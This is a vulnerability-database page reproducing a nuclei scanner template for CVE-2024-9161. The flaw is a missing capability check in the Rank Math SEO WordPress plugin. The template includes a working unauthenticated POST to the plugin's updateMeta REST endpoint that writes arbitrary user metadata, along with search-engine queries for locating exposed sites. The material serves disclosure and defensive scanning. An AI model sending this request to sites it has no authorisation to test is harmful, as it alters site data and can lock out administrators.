Lucene search
K

Rank Math SEO < 1.0.229 - Unauthenticated User and Term Metadata Insert/Update/Deletion

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 27 Views

Rank Math SEO plugin up to 1.0.228 lets unauthenticated users insert, update, or delete user and term metadata; upgrade to 1.0.229.

Related
Refs
Code
id: CVE-2024-9161

info:
  name: Rank Math SEO < 1.0.229 - Unauthenticated User and Term Metadata Insert/Update/Deletion
  author: Kazgangap
  severity: medium
  description: |
    Rank Math SEO – AI SEO Tools to Dominate SEO Rankings plugin for WordPress contains a missing capability check on 'update_metadata' in all versions up to 1.0.228, letting unauthenticated attackers insert, update, or delete metadata, including user and term metadata, potentially causing loss of access to the admin dashboard.
  impact: |
    Unauthenticated attackers can modify or delete metadata, leading to data loss and potential denial of access to the admin dashboard.
  remediation: |
    Update to version 1.0.229 or later.
  reference:
    - https://wpscan.com/vulnerability/95be2559-f0e2-4e98-9bef-3989df0d25bf/
    - https://plugins.trac.wordpress.org/browser/seo-by-rank-math/trunk/includes/rest/class-shared.php#L120
    - https://plugins.trac.wordpress.org/browser/seo-by-rank-math/trunk/includes/rest/class-shared.php#L161
    - https://plugins.trac.wordpress.org/browser/seo-by-rank-math/trunk/includes/rest/class-shared.php#L162
    - https://plugins.trac.wordpress.org/browser/seo-by-rank-math/trunk/includes/rest/class-shared.php#L64
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
    cvss-score: 6.5
    cve-id: CVE-2024-9161
    cwe-id: CWE-862
    epss-score: 0.02045
    epss-percentile: 0.78813
    cpe: cpe:2.3:a:rankmath:seo:*:*:*:*:free:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: rankmath
    product: seo
    framework: wordpress
    shodan-query: http.html:"/wp-content/plugins/seo-by-rank-math/"
    fofa-query: body="/wp-content/plugins/seo-by-rank-math/"
    publicwww-query: "/wp-content/plugins/seo-by-rank-math/"
  tags: cve,cve2024,wordpress,seo-by-rank-math,wp-plugin,wpscan,rankmath,intrusive,vkev

variables:
  objectid: "{{rand_int(1,9)}}"
  data: "meta_{{to_lower(rand_text_alpha(12))}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/seo-by-rank-math/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "Rank Math")'
        condition: and
        internal: true

  - raw:
      - |
        POST /wp-json/rankmath/v1/updateMeta HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "objectType": "user",
          "objectID": {{objectid}},
          "meta": {
            "{{data}}": "{{data}}"
          }
        }

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"slug", "true", "schemas")'
          - 'contains(content_type, "application/json")'
          - "status_code == 200"
        condition: and
# digest: 4a0a004730450220161ba04fccf9e58b9f4da79c1e91d027d1bfa664764925012c93bd67d7c64611022100fb17a8db12d7516017c9bb100eb0cacab37be89ef3233747271a5c312b3da253:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.7Medium risk
Vulners AI Score5.7
CVSS 3.16.5
EPSS0.02045
SSVC
27